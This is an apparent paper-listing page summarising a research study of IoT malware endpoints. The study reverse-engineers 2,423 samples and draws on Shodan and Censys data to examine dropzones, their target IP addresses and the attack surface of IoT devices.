Analyzing Endpoints in the Internet of Things Malware
Jinchun Choi, Afsah Anwar, Hisham Alasmary, Jeffrey Spaulding, DaeHun, Nyang, Aziz Mohaisen

TL;DR
This paper conducts a detailed analysis of IoT malware endpoints by reverse-engineering samples and leveraging Internet-wide scanner data to understand attack patterns and device vulnerabilities.
Contribution
It introduces a comprehensive data-driven approach to analyze IoT malware endpoints and their relationships with target IPs and dropzones.
Findings
Identified patterns in dropzone-target relationships.
Mapped attack surface of IoT devices.
Enhanced understanding of IoT malware infrastructure.
Abstract
The lack of security measures in the Internet of Things (IoT) devices and their persistent online connectivity give adversaries an opportunity to target them or abuse them as intermediary targets for larger attacks such as distributed denial-of-service (DDoS) campaigns. In this paper, we analyze IoT malware with a focus on endpoints to understand the affinity between the dropzones and their target IP addresses, and to understand the different patterns among them. Towards this goal, we reverse-engineer 2,423 IoT malware samples to obtain IP addresses. We further augment additional information about the endpoints from Internet-wide scanners, including Shodan and Censys. We then perform a deep data-driven analysis of the dropzones and their target IP addresses and further examine the attack surface of the target device space.
Click any figure to enlarge with its caption.
Figure 1Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.
